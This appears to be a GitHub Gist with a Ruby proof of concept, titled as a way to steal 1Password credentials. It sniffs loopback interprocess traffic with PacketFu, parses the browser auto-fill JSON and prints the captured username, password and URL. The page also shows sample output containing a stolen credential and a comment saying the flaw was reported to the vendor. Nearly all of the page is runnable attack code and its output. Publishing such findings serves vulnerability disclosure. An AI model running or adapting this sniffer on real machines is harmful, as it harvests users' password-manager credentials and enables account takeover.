Last active
October 10, 2019 23:09
-
-
Save claudijd/65dd4bdd0975bd0c4bc42af8de003730 to your computer and use it in GitHub Desktop.
Steal 1Password credentials from browser auto-fill PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Path setting slight of hand: | |
| $: << File.expand_path("../../lib", __FILE__) | |
| require 'packetfu' | |
| require 'json' | |
| capture_thread = Thread.new do | |
| cap = PacketFu::Capture.new(:iface => 'lo0', :start => true) | |
| cap.stream.each do |p| | |
| pkt = PacketFu::Packet.parse p | |
| if pkt.payload.include?("executeFillScript") | |
| parsed_json = JSON.parse(pkt.payload.match(/{"action.*/)[0]) | |
| username = parsed_json["payload"]["script"][1][2] | |
| password = parsed_json["payload"]["script"][3][2] | |
| url = parsed_json["payload"]["url"] | |
| puts "[+] Stolen Credentials: user(#{username}), password(#{password}), url(#{url})" | |
| end | |
| end | |
| end | |
| puts "Listening for 1Password interprocess traffic on loopback..." | |
| capture_thread.join |
Funny story about this, I found it too a couple months ago, reported it and 1Password really didn't seem to care.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
$ rvmsudo ruby examples/steal_1password_creds.rb
Listening for 1Password interprocess traffic on loopback...
[+] Stolen Credentials: user(wbrandis), password(myvoiceismypassportverify), url(https://login.yahoo.com/config/login_verify2?&.src=ym)